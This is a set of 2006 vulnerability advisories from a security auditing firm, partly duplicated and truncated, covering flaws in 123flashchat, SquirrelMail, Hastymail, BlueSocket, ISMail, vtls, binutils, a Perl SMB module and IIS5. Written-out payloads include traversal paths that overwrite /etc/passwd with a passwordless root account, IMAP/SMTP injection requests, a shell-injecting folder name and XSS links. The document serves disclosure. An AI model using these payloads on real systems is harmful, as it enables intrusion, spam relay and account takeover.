2006-001: Arbitrary remote file creation in 123flashchat server.
Original release date: January 09, 2006 Last revised: January 13, 2006 Discovered by: Jesus Olmos Gonzalez Severity: 4/5
BACKGROUND
123 Flash Chat is a full featured java chat server and flash chat client, the product homepage is www.123flashchat.com and it is possible to test it at:
^@^B^@^<username>^@^V<password>^@^E<email> or ^@^B^@^<username>^@^V<password>^@^@
allow field size null parse example username 32 no (allow transversal ../) ../room_1.txt password 32 no allow all 123 repeat-pass 32 no allow all 123 email 128 yes /^.+@.+\..+$/aa a@b.c
Username field allow anybody to create a file in our system, with same priviledges as the server and almost arbitrary content.
This is dangerous becouse, a user can get others account, erase logs, modify the server's /etc/passwd or modify other config files.
PROOF OF CONCEPT
In the exploitation, there are two factors, WHERE and WHAT. The username vector is WHERE, and WHAT can be: 1) password 2) email address if we need more bytes
Possible attacs:
../../../../logs/access.log erase logs. ../../../../logs/error.log erase logs. ../default/logs/access.log erase logs. ../members/parker change parker's password, if now we login with parker user, he will be disconected. ../../../../../../../etc/passwd if server run as root. ../../../../etc/ssh/sshd.conf if server run as root. ../../../../../var/log/messages if server run as root. ../../../../var/www/htdocs/x.php try to build a shell. ../../../etc/groups/default.xml create an admin account by or other config settings. ../../../fcserver.sh try to replace the script. etc...
It is possible to replace the existent files, to make a DoS, to erase logs, to create/change system accounts, to get other chat user/admin accounts or to make other effects in server's system.
*Possible* remote execution if some config file is modified.
Is it possible to hijack and modify the raw command, to inyect line feed (0x0a) or other characters to construct arbitrary content of the created/overwrited file. Example:
If the server is Windows, is it possible to get execution.
BUSINESS IMPACT
The chat service can be crashed or compromissed remotelly.
SYSTEMS AFFECTED
This vulnerability affects the 123flaschat server up to 5.1 (released on Dec 22, 2005)
tested at: 123flaschat server 5.1 123flaschat server 5.0
SOLUTION
Upgrade to newer version.
REFERENCES
-
CREDITS
This vulnerability has been discovered and reported by Jesús Olmos González (jolmos (at) isecauditors (dot) com).
REVISION HISTORY
January 09, 2006: Initial release. January 13, 2006: Vendor response actualization.
DISCLOSURE TIMELINE
January 04, 2006 The vulnerability discovered by Internet Security Auditors (www.isecauditors.com) January 09, 2006 Initial vendor notification sent. January 10, 2006 Quick response, Version 5.1_2 was released.
LEGAL NOTICES
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors, S.L. accepts no responsibility for any damage caused by the use or misuse of this information.
2006-002: IMAP/SMTP Command Injection in SquirrelMail
Original release date: January 12, 2006 Last revised: February 27, 2006 Discovered by: Vicente Aguilera Díaz Severity:4/5
BACKGROUND
SquirrelMail is a standards-based webmail package written in PHP4. It includes built-in pure PHP support for the IMAP and SMTP protocols, and all pages render in pure HTML 4.0 (with no JavaScript required) for maximum compatibility across browsers. It has very few requirements and is very easy to configure and install. SquirrelMail has all the functionality you would want from an email client, including strong MIME support, address books, and folder manipulation. The product homepage is http://www.squirrelmail.org.
DESCRIPTION
SquirrelMail provides a graphical interface to interact with mail servers across the IMAP and SMTP protocols. Improper command and information validation transmitted by SquirrelMail to the mail servers during the normal use of this application (mailbox management, e-mail reading and sending, etc.) facilitates that an authenticate malicious user could inject arbitrary IMAP/SMTP commands into the mail servers used by SquirrelMail across parameters used by the webmail front-ent in its communication with these mail servers. This is become dangerous because the injection of these commands allows an intruder to evade restrictions imposed at application level, and exploit vulnerabilities that could exist in the mail servers through IMAP/SMTP commands.
PROOF OF CONCEPT
IMAP example SquirrelMail Vulnerable parameter: "passed_id" (and possibly others)
When a user clicks in the subject of an e-mail, he creates a GET request as: http://<victim>/src/read_body.php?mailbox=INBOX&passed_id=1&startMessage=1&show_more=0
A malicious user can modify the value of the "passed_id" parameter and inject any IMAP command.
Example: Injection of the CAPABILITY IMAP command across the "passed_id" parameter:
The page returned by the web server shows the result of the CAPABILITY command.
Example:
Z900 OK CAPABILITY completed * CAPABILITY IMAP4rev1 CHILDREN NAMESPACE THREAD=ORDEREDSUBJECT THREAD=REFERENCES SORT QUOTA ACL ACL2=UNION Z901 OK CAPABILITY completed
SMTP example SquirrelMail Vulnerable parameter: "subject" (and possibly others)
When a user send a message, he create a POST request like:
POST http://<victim>/src/compose.php HTTP/1.1... -----------------------------84060780712450133071594948441 Content-Disposition: form-data; name="subject" Proof of Concept -----------------------------84060780712450133071594948441 ...
A malicious user can modify the value of the "subject" parameter and inject any SMTP command.
Example: Relay from a non-existent e-mail address
... -----------------------------84060780712450133071594948441 Content-Disposition: form-data; name="subject" Proof of Concept . mail from: hacker@domain.com rcpt to: victim@otherdomain.com data This is a proof of concept of the SMTP command injection in SquirrelMail . -----------------------------84060780712450133071594948441 ...
BUSINESS IMPACT
The IMAP/SMTP command injection allow SPAM, relay, exploit IMAP and SMTP vulnerabilities in the mail servers and evade all the restrictions at the application layer.
SYSTEMS AFFECTED
IMAP Injection: All versions prior to 1.4.6. SMTP Injection: SquirrelMail 1.2.7 (and older versions).
This vulnerability has been discovered and reported by Vicente Aguilera Diaz (vaguilera=at=isecauditors=dot=com).
REVISION HISTORY
January 12, 2006: Initial release January 20, 2006: Disclosure timeline updated February 16, 2006: Disclosure timeline updated February 27, 2006: Disclosure timeline updated
DISCLOSURE TIMELINE
December, 2005 Vulnerability acquired by Vicente Aguilera Diaz (Internet Security Auditors) January 12, 2006 Initial vendor notification sent. January 19, 2006 The vulnerability is fixed in 1.4.6 cvs and 1.5.1 cvs. February 15, 2006 The vendor published the vulnerability in the security section. February 25, 2006 The CVE-2006-0377 is updated.
LEGAL NOTICES
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors, S.L. accepts no responsibility for any damage caused by the use or misuse of this information.
2006-003: Arbitrary flash code remote execution in 123flashchat.
Original release Date: January 12, 2006 Last revised: January 23, 2006 Discovered by: Jesus Olmos Gonzalez Severity: 4/5
BACKGROUND
123 Flash Chat is a full featured java chat server and flash chat client, the product homepage is www.123flashchat.com and it is possible to test it at:
The flash chat client uses too much the eval sentence, in most of cases there is vulnerable becouse there is included variables in the eval, and users can change the value of them.
If we can write in a eval, we can inject code, if our user name has the character ; we could write code inside the client.
If its possible to write code, a cracker can convet his user to an admin by changing his variables. Is possible to inject to other clients too.
let's see the vulnerable code:
function openOneAVWindow(username) { var i = 0; if (i < roomUsers.length) { var user = roomUsers[i]; if (user.name == username) { if (eval("_root.avmc_" + user.name) == "")
and this will be executed when a window is opened:
user.name=ADMIN_AVATAR_NAME;
Is not possible a username with the " character, then is possible to use the ADMIN_AVATAR_NAME constat wich value is "admin".
PROOF OF CONCEPT
We have not exploited sucsessfuly, but there is the vulnerability.
BUSINESS IMPACT
-
SYSTEMS AFFECTED
This vulnerability affects the 123flaschat server up to 5.1 (released on Dec 22, 2005)
SOLUTION
No patch available yet.
REFERENCES
-
CREDITS
This vulnerability has been discovered and reported by Jesus Olmos Gonzalez (jolmos (at) isecauditors (dot) com).
REVISION HISTORY
January 13, 2006: Initial release. Jaunary 23, 2006: Update the Vendor response.
DISCLOSURE TIMELINE
January 04, 2006 The vulnerability discovered by Internet Security Auditors. January 13, 2006 Initial vendor notification sent. January 23, 2006 Vendor confirm that this is corrected in v5.1_2 i
LEGAL NOTICES
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors, S.L. accepts no responsibility for any damage caused by the use or misuse of this information.
This vulnerability has been discovered and reported by Jesus Olmos Gonzalez (jolmos (at) isecauditors (dot) com).
REVISION HISTORY
April 18, 2006: Initial release. November 13, 2007: Last revision.
DISCLOSURE TIMELINE
February 27, 2006: The vulnerability discovered by Internet Security Auditors. April 18, 2006: Initial vendor notification sent. No response April 26, 2006: Second vendor notification sent. Ping pong responses. September 14, 2006: Third vendor notification sent. No response. December 01, 2006: Fourth vendor notification sent. No response. December 04, 2006: New patch coming. No schedule. January 02, 2007: Fifth vendor contact to ask for planning. No response. January 22, 2007: Sixth vendor contact to ask for planning. Scheduled. March 23, 2007: Seventh vendor contact to ask for planning. Re-Scheduled. May 22, 2007: Eigth vendor contact to ask for planning. Re-Scheduled. October 01, 2007: Nineth vendor contact to ask for planning. Patch will be published in October. November 09, 2007: Tenth. Version 48.1.1 has been approved for general release and published. November 13, 2007: Advisory Published.
LEGAL NOTICES
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors, S.L. accepts no responsibility for any damage caused by the use or misuse of this information.
2006-005: strings, dbg and other binutils commands are vulnerable to a Denial of Service.
Original release Date: April 16th, 2006 Last revised: April 26th, 2006 Discovered by: Jesús Olmos González Severity: 2/5
BACKGROUND
strings and dbg are some of the tools from the binutils package, it could be used to look-for printable strings in a binary file, debug and reverse engineering of executables.
A binary file can be protected from the strings usage.
Is it possible to make a binary file with some special chars in a variable, that when is compiled is imposible to extract the printable strings of the elf, using the strings tool. It will segfault or hang-up.
(gdb) r evil Starting program: /usr/bin/strings evil (no debugging symbols found) (no debugging symbols found) (no debugging symbols found) (no debugging symbols found)
Program received signal SIGSEGV, Segmentation fault. 0xb7e9ecbd in bfd_hash_lookup () from /usr/lib/libbfd-2.16.1.so (gdb)
The problem is in bfd_hack_lookup from libbfd-2.16.1.so library, at this snippet of code:
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors, S.L. accepts no responsibility for any damage caused by the use or misuse of this information.
or installed: perl -MCPAN -e shell install Filesys::SmbClientParser
DESCRIPTION
If a host scans your shared folder whith a tool that uses this module, you can execute shell commands in his host.
This module has the following snippet of code:
my @var = `$pargs`;
pargs it is parsed with the following poor filters:
my $pargs; if ($args=~/^([^;]*)$/) { # no ';' nickel $pargs=$1; } elsif ($smbscript) { # ';' is allowed inside -c ' ' if ($args=~/^([^;]* -c '[^']*'[^;]*)$/) { $pargs=$1; } else { # what that ? die("Why a ';' here ? => $args"); } } else { die("Why a ';' here ? => $args"); }
If thereis a folder inside a shared folder with the following name:
' x && xterm &#
The perl will spawn an xterm :) Note that this was reported at 2006 and no answer received, be carefoul with cpan modules.
PROOF OF CONCEPT
This folder name inside the shared folder:
' x && xterm &#
Will execute the following: /usr/bin/smbclient "//x.x.x.x/vulns" -U "user%pass" -d0 -c 'cd "' x && xterm &#"' -D "/poc"
This proof of concept spawns a xterm at vyctims xwindow, replace xterm for the evil commands.
BUSINESS IMPACT
-
SYSTEMS AFFECTED
Versions up to 2.7 included (all)
SOLUTION
Use this patch:
138a139,146 > #------------------------------------------------------------------------------ > # Sanitize (jolmos[@]isecauditors[.]com) > #------------------------------------------------------------------------------ > sub Sanitize { > my $danger = $_[0]; #There are many danger bytes, but if the > $$danger =~ s/\n|\r|'|"|//ig; #danger string is inside "" or '' the only > #option is break with ' or " or \r or \n > } 265a274 > foreach my $i (@_) { &Sanitize(\$i); } 287a297 > foreach my $i (@_) { &Sanitize(\$i); } 321a332 > foreach my $i (@_) { &Sanitize(\$i); } 331a343 > foreach my $i (@_) { &Sanitize(\$i); } 345a358 > foreach my $i (@_) { &Sanitize(\$i); } 359a373 > foreach my $i (@_) { &Sanitize(\$i); } 373a388 > foreach my $i (@_) { &Sanitize(\$i); } 375a391 > 387a404 > foreach my $i (@_) { &Sanitize(\$i); } 398a416 > foreach my $i (@_) { &Sanitize(\$i); } 409a428 > foreach my $i (@_) { &Sanitize(\$i); } 487a507 > foreach my $i (@_) { &Sanitize(\$i); }
This vulnerability has been discovered and reported by Jesus Olmos Gonzalez (jolmos (at) isecauditors (dot) com).
REVISION HISTORY
April 26, 2006: Initial release. July 14, 2008: Patch added.
DISCLOSURE TIMELINE
February 26, 2006: The vulnerability discovered by Internet Security Auditors. April 26, 2006: Initial vendor notification sent. September 14, 2006: Second notification: correction in one week. No correction. December 2, 2006: Third notification: no response. January 18, 2007: Forth notification: no response. May 1, 2007: Fifth notification: no response. November 11, 2007: Sixth notification: no response. July 14, 2008: No response from the developer (Alain Barbet), we wrote the patch.
LEGAL NOTICES
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors, S.L. accepts no responsibility for any damage caused by the use or misuse of this information.
2006-007: The BlueSocket web administration is vulnerable to a Cross Site Scripting attack
Original release Date: April 27th, 2006 Last revised: December 1st, 2006 Discovered by: Jesús Olmos González Severity: 2/5
BACKGROUND
BSC 2100 product is included in the Blue Secure Family (www.bluesocket.com).
BlueSecure Controllers provide high-performance, reliable, policy-based WLAN security and management solutions that have been deployed by hundreds of large institutions, enterprises, and public access providers.
DESCRIPTION
The admin.pl perl code don't sanitize the imputs and then wen it tries to rewrite the username at the input, html + script code could be rewrited and executed by the browser.
This crossite is in the administration of the security product, it has been tested only in BSC 2100.
Is it possible to send a fake email to the admin spoofing the product address, saying that the configuration is not ok and sending the special link.
If the admin press the link and validate in aparently normal interface, his credentials will be sended to the attacker.
If this is done with a good social engineering will be a great risk.
PROOF OF CONCEPT
This POC will inject some html to modify the look and feel of the authentication, and attacker could inject script code to send back the credentials:
Credentials could be stolen due social engineering attacks.
SYSTEMS AFFECTED
Versions prior 5.2 or without 5.1.1-BluePatch
SOLUTION
Update to 5.2 version or apply 5.1.1-BluePatch
REFERENCES
Vulnerability item number 4484 in the Bluepatch V6 for 5.1.1.1 Release Notes.
CREDITS
This vulnerability has been discovered and reported by Jesus Olmos Gonzalez (jolmos (at) isecauditors (dot) com).
REVISION HISTORY
April 27, 2006: Initial vendor contact. April 28, 2006: Vendor updates its near patch. June 21, 2006: Publication of the patch. September 16, 2006: Vendor confirms inclusion in referenced patch. September 17, 2006: Advisory revised.
DISCLOSURE TIMELINE
April 26, 2006: The vulnerability discovered by Internet Security Auditors (www.isecauditors.com). December 1, 2006: Advisory finally Published
LEGAL NOTICES
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors, S.L. accepts no responsibility for any damage caused by the use or misuse of this information.
2006-010: XSS vulnerability in error page of ISMail
Original release date: September 28, 2006 Last revised: December 1, 2006 Discovered by: Vicente Aguilera Díaz Severity: 3/5
BACKGROUND
ISMail is a webmail system. Programmed in HTML and PHP, it is designed to work with any imap server.
ISMail requires that PHP 4.2+, compiled with and IMAP and Session support, be installed on the server that runs it.
You have a choice of data-store backends (xml, encrypted xml, mysql, and postgresql are included, each requiring their respective PHP modules), and miscellaneous other options that can make the Inside Systems Mail experience a little friendlier.
Unlike most other webmail programs, Inside Systems Mail is both quick and easy to use. The layout, complete with address book and folder options, is simple and familiar to most users.
For administrators, the data-stores and options are easily extensible so that Inside Systems Mail can be dropped in nearly any configuration with minimal extra coding.
DESCRIPTION
The error page "error.php" receives a parameter facilitated in the querystring that shows the error message.
This parameter ("error") can be manipulated by an attacker to inject arbitrary script/HTML code.
This is dangerous because it's possible to realize XSS's attacks to obtain the session cookies of authenticated users and to spoof his session, or deface the error page.
An attacker can spoof the session of other authenticated users allowing to access to his mail, or deface the error page.
SYSTEMS AFFECTED
This vulnerability has been tested in the last version of ISMail (2.0, released on 2005-01-20). Possibly all versions are affected by this vulnerability.
This vulnerability has been discovered and reported by Vicente Aguilera Díaz (vaguilera (at) isecauditors (dot) com).
REVISION HISTORY
September 28, 2006: Initial release.
DISCLOSURE TIMELINE
September 27, 2006 The vulnerability discovered by Internet Security Auditors (www.isecauditors.com). September 28, 2006 Initial vendor notification sent. October 1, 2006 The vendor fixed the vulnerability in the repository.
LEGAL NOTICES
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors, S.L. accepts no responsibility for any damage caused by the use or misuse of this information.
Original release date: September 28, 2006 Last revised: December 1, 2006 Discovered by: Vicente Aguilera Díaz Severity: 3/5
BACKGROUND
Hastymail is yet another webmail IMAP client written in PHP. Hastymail is designed for speed, RFC compatibility, simplicity, and security. Our goal is to create a simple interface with powerful but easy to use options that make managing your IMAP account effective and fast.
Hastymail is NOT groupware. We are focused on being a functional and fast webmail client.
Hastymail provides a graphical interface to interact with mail servers across the IMAP/SMTP protocols.
Improper command and information validation transmitted by Hastymail to the mail servers during the normal use of this application (for example, acceding to the mailbox) facilitates that an authenticate malicious user could inject arbitrary IMAP/SMTP commands into the mail servers used by Hastymail across parameters used by the webmail front-end in its communication with these mail servers.
This is become dangerous because the injection of these commands allows an intruder to evade restrictions imposed at application level, and exploit vulnerabilities that could exist in the mail servers through IMAP/SMTP commands.
PROOF OF CONCEPT
== IMAP Injection example (1.5 version) =============
When a user send a message, he create a POST request like:
POST http://<webserver>/<path_to_hastymail>/html/compose.php HTTP/1.1 ... -----------------------------84060780712450133071594948441 Content-Disposition: form-data; name="subject" Proof of Concept -----------------------------84060780712450133071594948441 ...
A malicious user can modify the value of the "subject" parameter and inject any SMTP command.
Example: Relay from a non-existent e-mail address.
... -----------------------------84060780712450133071594948441 Content-Disposition: form-data; name="subject" Proof of Concept . mail from: hacker@domain.com rcpt to: victim@otherdomain.com data This is a proof of concept of the SMTP command injection in Hastymail . -----------------------------84060780712450133071594948441 ...
BUSINESS IMPACT
The IMAP/SMTP command injection allow to exploit vulnerabilities in the IMAP/SMTP servers and evade all the restrictions at the application layer.
SYSTEMS AFFECTED
This vulnerability has been tested in:
Last development version: 1.5, released on February 17, 2006
Last stable version: 1.0.2, August 23, 2004
Possibly all versions are affected by this vulnerability.
This vulnerability has been discovered and reported by Vicente Aguilera Diaz (vaguilera (at) isecauditors (dot) com).
REVISION HISTORY
September 28, 2006: Initial release. October 3, 2006: Project admin response. October 9, 2006: Project admin publish the patch for 1.5 and 1.02 versions.
DISCLOSURE TIMELINE
September 28, 2006: Vulnerability acquired by Internet Security Auditors (www.isecauditors.com). December 1, 2006: Advisory published.
LEGAL NOTICES
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors, S.L. accepts no responsibility for any damage caused by the use or misuse of this information.
2006-013: Microsoft IIS5 NTLM and Basic authentication bypass
Original release date: December 15, 2006 Last revised: May 22, 2007 Discovered by: Jesus Olmos Gonzalez Severity: 5/5
BACKGROUND
Microsoft Internet Information Server Web Server can protect the private contents with a basic or NTLM authentication.
Many web pages, intranets and extranets rely on Microsoft security.
IISv5 has a "Hit-highlighting" functionality that opens some site object and highlights some part of it; that has had a transversal vulnerability in the past. Now it can be used to bypass the IIS authentication.
Any Internet user can access the private web directories and files of any IISv5 web, by highlighting it with "Hit-highlighting". To use this functionality the user has to supply the CiWebhitsfile parameter to the null.htw object.
The impact depends on the web contents. Attackers could gain access to all protected documents, and ASP code. When an attacker accesses a trusted zone, the probability to get command execution is higher.
SYSTEMS AFFECTED
Internet Information Services Version 5, any Service Pack.
SOLUTION
Protect the files from the NTFS filesystem instead of relying on the IIS protection. Microsoft recommends not to use IISv5.
This vulnerability has been discovered and reported by Jesus Olmos Gonzalez (jolmos (at) isecauditors (dot) com)
REVISION HISTORY
December 15, 2006: Initial release March 19, 2007: Latest revision March 27, 2007: First notification to the vendor. Response: under revision. April 11, 2007: The vendor considers little changes in their KB. April 12, 2007: We accept it and propose add comments about the severity of the problem. Rejected. May 21, 2007: Published. As the vendor information is not enough detailed.
DISCLOSURE TIMELINE
December 15, 2006: Vulnerability acquired by Jesus Olmos Gonzalez (Internet Security Auditors)
LEGAL NOTICES
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors, S.L. accepts no responsibility for any damage caused by the use or misuse of this information.
Advisories 2006
2006-001: Arbitrary remote file creation in 123flashchat server.
Original release date: January 09, 2006
Last revised: January 13, 2006
Discovered by: Jesus Olmos Gonzalez
Severity: 4/5
BACKGROUND
123 Flash Chat is a full featured java chat server and flash chat client, the product homepage is www.123flashchat.com and it is possible to test it at:
DESCRIPTION
The chat server has a user-register functionality, that can be enabled by the following sentence:
in /server/etc/groups/default.xml
By default it is enabled and anybody can create a chat account.
The register form ask the following questions:
username, password, repeat-password and email.
When a user creates an account, a file is created at members directory:
The user file has the following structure:
or
^@^B^@^<username>^@^V<password>^@^@
allow
field size null parse example
username 32 no (allow transversal ../) ../room_1.txt
password 32 no allow all 123
repeat-pass 32 no allow all 123
email 128 yes /^.+@.+\..+$/aa a@b.c
Username field allow anybody to create a file in our system, with same priviledges as the server and almost arbitrary content.
This is dangerous becouse, a user can get others account, erase logs, modify the server's /etc/passwd or modify other config files.
PROOF OF CONCEPT
In the exploitation, there are two factors, WHERE and WHAT.
The username vector is WHERE, and WHAT can be:
1) password
2) email address if we need more bytes
Possible attacs:
../../../../logs/error.log erase logs.
../default/logs/access.log erase logs.
../members/parker change parker's password, if now we login with parker user, he will be disconected.
../../../../../../../etc/passwd if server run as root.
../../../../etc/ssh/sshd.conf if server run as root.
../../../../../var/log/messages if server run as root.
../../../../var/www/htdocs/x.php try to build a shell.
../../../etc/groups/default.xml create an admin account by or other config settings.
../../../fcserver.sh try to replace the script.
etc...
It is possible to replace the existent files, to make a DoS, to erase logs, to create/change system accounts, to get other chat user/admin accounts or to make other effects in server's system.
*Possible* remote execution if some config file is modified.
Is it possible to hijack and modify the raw command, to inyect line feed (0x0a) or other characters to construct arbitrary content of the created/overwrited file.
Example:
<Register email="" passwd="(0x0a)root::0:0:root:/bin/bash(0x0a)"
user="../../../../../../../etc/passwd" />(0x0a)
/etc/passwd will be:
root::0:0:root:/bin/bash
\0\0
If the server is Windows, is it possible to get execution.
BUSINESS IMPACT
The chat service can be crashed or compromissed remotelly.
SYSTEMS AFFECTED
This vulnerability affects the 123flaschat server up to 5.1 (released on Dec 22, 2005)
tested at:
123flaschat server 5.1
123flaschat server 5.0
SOLUTION
Upgrade to newer version.
REFERENCES
-
CREDITS
This vulnerability has been discovered and reported by
Jesús Olmos González (jolmos (at) isecauditors (dot) com).
REVISION HISTORY
January 09, 2006: Initial release.
January 13, 2006: Vendor response actualization.
DISCLOSURE TIMELINE
January 04, 2006 The vulnerability discovered by Internet Security Auditors (www.isecauditors.com)
January 09, 2006 Initial vendor notification sent.
January 10, 2006 Quick response, Version 5.1_2 was released.
LEGAL NOTICES
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors, S.L. accepts no responsibility for any damage caused by the use or misuse of this information.
Volver al inicio
2006-002: IMAP/SMTP Command Injection in SquirrelMail
Original release date: January 12, 2006
Last revised: February 27, 2006
Discovered by: Vicente Aguilera Díaz
Severity: 4/5
BACKGROUND
SquirrelMail is a standards-based webmail package written in PHP4. It includes built-in pure PHP support for the IMAP and SMTP protocols, and all pages render in pure HTML 4.0 (with no JavaScript required) for maximum compatibility across browsers. It has very few requirements and is very easy to configure and install. SquirrelMail has all the functionality you would want from an email client, including strong MIME support, address books, and folder manipulation.
The product homepage is http://www.squirrelmail.org.
DESCRIPTION
SquirrelMail provides a graphical interface to interact with mail servers across the IMAP and SMTP protocols.
Improper command and information validation transmitted by SquirrelMail to the mail servers during the normal use of this application (mailbox management, e-mail reading and sending, etc.) facilitates that an authenticate malicious user could inject arbitrary IMAP/SMTP commands into the mail servers used by SquirrelMail across parameters used by the webmail front-ent in its communication with these mail servers.
This is become dangerous because the injection of these commands allows an intruder to evade restrictions imposed at application level, and
exploit vulnerabilities that could exist in the mail servers through IMAP/SMTP commands.
PROOF OF CONCEPT
IMAP example
SquirrelMail Vulnerable parameter: "passed_id" (and possibly others)
When a user clicks in the subject of an e-mail, he creates a GET request as:
http://<victim>/src/read_body.php?mailbox=INBOX&passed_id=1&startMessage=1&show_more=0
A malicious user can modify the value of the "passed_id" parameter and inject any IMAP command.
Example:
Injection of the CAPABILITY IMAP command across the "passed_id" parameter:
http://<victim>/src/read_body.php?mailbox=INBOX&passed_id=
1%20BODY[1]%0D%0AZ900%20CAPABILITY%0D%0AZ901%20CAPABILITY%0D%
0AZ902%20FETCH%201&startMessage=1&show_more=0
The page returned by the web server shows the result of the CAPABILITY command.
Example:
* CAPABILITY IMAP4rev1 CHILDREN NAMESPACE THREAD=ORDEREDSUBJECT THREAD=REFERENCES
SORT QUOTA ACL ACL2=UNION
Z901 OK CAPABILITY completed
SMTP example
SquirrelMail Vulnerable parameter: "subject" (and possibly others)
When a user send a message, he create a POST request like:
-----------------------------84060780712450133071594948441
Content-Disposition: form-data; name="subject" Proof of Concept
-----------------------------84060780712450133071594948441
...
A malicious user can modify the value of the "subject" parameter and inject any SMTP command.
Example:
Relay from a non-existent e-mail address
-----------------------------84060780712450133071594948441
Content-Disposition: form-data; name="subject"
Proof of Concept
. mail from: hacker@domain.com
rcpt to: victim@otherdomain.com
data
This is a proof of concept of the SMTP command injection in SquirrelMail
. -----------------------------84060780712450133071594948441
...
BUSINESS IMPACT
The IMAP/SMTP command injection allow SPAM, relay, exploit IMAP and SMTP vulnerabilities in the mail servers and evade all the restrictions at the application layer.
SYSTEMS AFFECTED
IMAP Injection: All versions prior to 1.4.6.
SMTP Injection: SquirrelMail 1.2.7 (and older versions).
SOLUTION
Replace \r and \n from $mailbox in the function sqimap_mailbox_select.
Patch available: http://www.squirrelmail.org/security/issue/2006-02-15
REFERENCES
- http://www.squirrelmail.org/security/issue/2006-02-15
- CVE-2006-0377
CREDITS
This vulnerability has been discovered and reported by Vicente Aguilera Diaz (vaguilera=at=isecauditors=dot=com).
REVISION HISTORY
January 12, 2006: Initial release
January 20, 2006: Disclosure timeline updated
February 16, 2006: Disclosure timeline updated
February 27, 2006: Disclosure timeline updated
DISCLOSURE TIMELINE
December, 2005 Vulnerability acquired by Vicente Aguilera Diaz (Internet Security Auditors)
January 12, 2006 Initial vendor notification sent.
January 19, 2006 The vulnerability is fixed in 1.4.6 cvs and 1.5.1 cvs.
February 15, 2006 The vendor published the vulnerability in the security section.
February 25, 2006 The CVE-2006-0377 is updated.
LEGAL NOTICES
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors, S.L. accepts no responsibility for any damage caused by the use or misuse of this information.
Volver al inicio
2006-003: Arbitrary flash code remote execution in 123flashchat.
Original release Date: January 12, 2006
Last revised: January 23, 2006
Discovered by: Jesus Olmos Gonzalez
Severity: 4/5
BACKGROUND
123 Flash Chat is a full featured java chat server and flash chat client, the product homepage is www.123flashchat.com and it is possible to test it at:
http://host10.123flaschat.com/123flaschat.swf
http://www.123flashchat.com/123flashchat.swf
DESCRIPTION
The flash chat client uses too much the eval sentence, in most of cases there is vulnerable becouse there is included variables in the eval, and users can change the value of them.
If we can write in a eval, we can inject code, if our user name has the character ; we could write code inside the client.
If its possible to write code, a cracker can convet his user to an admin by changing his variables. Is possible to inject to other
clients too.
let's see the vulnerable code:
var i = 0;
if (i < roomUsers.length) {
var user = roomUsers[i];
if (user.name == username)
{
if (eval("_root.avmc_" + user.name) == "")
if our username is:
the eval will be:
and this will be executed when a window is opened:
Is not possible a username with the " character, then is possible to use the ADMIN_AVATAR_NAME constat wich value is "admin".
PROOF OF CONCEPT
We have not exploited sucsessfuly, but there is the vulnerability.
BUSINESS IMPACT
-
SYSTEMS AFFECTED
This vulnerability affects the 123flaschat server up to 5.1
(released on Dec 22, 2005)
SOLUTION
No patch available yet.
REFERENCES
-
CREDITS
This vulnerability has been discovered and reported by
Jesus Olmos Gonzalez (jolmos (at) isecauditors (dot) com).
REVISION HISTORY
January 13, 2006: Initial release.
Jaunary 23, 2006: Update the Vendor response.
DISCLOSURE TIMELINE
January 04, 2006 The vulnerability discovered by Internet Security Auditors.
January 13, 2006 Initial vendor notification sent.
January 23, 2006 Vendor confirm that this is corrected in v5.1_2 i
LEGAL NOTICES
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors, S.L. accepts no responsibility for any damage caused by the use or misuse of this information.
Volver al inicio
2006-004: Vtls.web.gateway cgi is vulnerable to a Cross Site Scripting attack.
Original release Date: April 18th, 2006
Last revised: November 13, 2007
Discovered by: Jesús Olmos González
Severity: 1/5
BACKGROUND
vtls.web.gateway cgi is a product from Visionary Technology in Library Solutions.
http://www.vtls.com
DESCRIPTION
Vtls.web.gateway cgi is vulnerable to a Cross Site Scripting attack. A malicious link could be used to steal user sessions.
PROOF OF CONCEPT
It is possible to execue html and javascript in the browser of who cliks in a link like this:
http://somevtlsweb.net/cgi-bin/vtls/vtls.web.gateway?authority=1&searcht...
%22%3E%3Ch1%3E%3Cmarquee%3EXSS%20bug%3C/marquee%3E%3C/h1%3E%3C!--&
kind=ns&conf=080104+++++++
BUSINESS IMPACT
-
SYSTEMS AFFECTED
All with this solution up to 48.1.0
SOLUTION
Update to Version 48.1.1
REFERENCES
www.vtls.com
CREDITS
This vulnerability has been discovered and reported by
Jesus Olmos Gonzalez (jolmos (at) isecauditors (dot) com).
REVISION HISTORY
April 18, 2006: Initial release.
November 13, 2007: Last revision.
DISCLOSURE TIMELINE
February 27, 2006: The vulnerability discovered by Internet Security Auditors.
April 18, 2006: Initial vendor notification sent. No response
April 26, 2006: Second vendor notification sent. Ping pong responses.
September 14, 2006: Third vendor notification sent. No response.
December 01, 2006: Fourth vendor notification sent. No response.
December 04, 2006: New patch coming. No schedule.
January 02, 2007: Fifth vendor contact to ask for planning. No response.
January 22, 2007: Sixth vendor contact to ask for planning. Scheduled.
March 23, 2007: Seventh vendor contact to ask for planning. Re-Scheduled.
May 22, 2007: Eigth vendor contact to ask for planning. Re-Scheduled.
October 01, 2007: Nineth vendor contact to ask for planning. Patch will be published in October.
November 09, 2007: Tenth. Version 48.1.1 has been approved for general release and published.
November 13, 2007: Advisory Published.
LEGAL NOTICES
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors, S.L. accepts no responsibility for any damage caused by the use or misuse of this information.
Volver al inicio
2006-005: strings, dbg and other binutils commands are vulnerable to a Denial of Service.
Original release Date: April 16th, 2006
Last revised: April 26th, 2006
Discovered by: Jesús Olmos González
